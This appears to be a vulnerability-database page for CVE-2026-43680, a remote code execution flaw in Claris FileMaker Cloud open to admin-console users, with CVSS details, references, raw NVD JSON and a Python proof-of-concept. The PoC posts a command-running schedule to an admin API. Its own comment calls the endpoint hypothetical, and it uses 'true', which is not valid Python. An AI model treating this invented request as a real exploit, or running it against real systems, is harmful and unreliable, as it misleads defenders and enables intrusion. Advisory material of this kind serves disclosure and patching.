CVE-2026-43680

Description

A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to bypass a front-end restriction on OS Script schedule types and execute arbitrary operating system commands on the underlying host. This issue is fixed in FileMaker Cloud 2.22.0.5.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:* - VULNERABLE

Claris FileMaker Cloud < 2.22.0.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target API endpoint for creating schedules (Hypothetical endpoint based on vulnerability description)
target_url = "https://<filemaker-cloud-host>/fmi/admin/api/v1/schedules"

# Admin session cookie or token (Required due to PR:H privilege requirement)
admin_session_token = "<VALID_ADMIN_CONSOLE_TOKEN>"

# Headers
headers = {
    "Authorization": f"Bearer {admin_session_token}",
    "Content-Type": "application/json"
}

# PoC Payload: Bypassing frontend restriction to execute arbitrary OS commands
# The frontend usually restricts 'scriptType' to safe options, but we send 'system' directly.
payload = {
    "scheduleName": "Malicious_PoC_Task",
    "scriptType": "system",  # Bypass front-end restriction
    "command": "touch /tmp/poc_success && whoami", # Arbitrary OS command to execute
    "enabled": true
}

try:
    # Send malicious request to backend API
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    
    if response.status_code == 201:
        print("[+] PoC Successful: Malicious schedule created.")
        print("[+] The command 'touch /tmp/poc_success' should have been executed on the host.")
    else:
        print(f"[-] PoC Failed with status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-43680
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-43680
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-43680/
[4] VulDB https://vuldb.com/cve/CVE-2026-43680
[5] https://support.claris.com/s/answerview?anum=000049153&language=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-43680", "sourceIdentifier": "[email protected]", "published": "2026-05-12T23:16:17.870", "lastModified": "2026-05-14T13:53:04.090", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Remote Code Execution vulnerability in Claris FileMaker Cloud allowed a user with Admin Console privileges to bypass a front-end restriction on OS Script schedule types and execute arbitrary operating system commands on the underlying host. This issue is fixed in FileMaker Cloud 2.22.0.5."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:claris:filemaker_cloud:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.22.0.5", "matchCriteriaId": "A0DBAD4E-B906-4130-8D79-FBDD67974E60"}]}]}], "references": [{"url": "https://support.claris.com/s/answerview?anum=000049153&language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}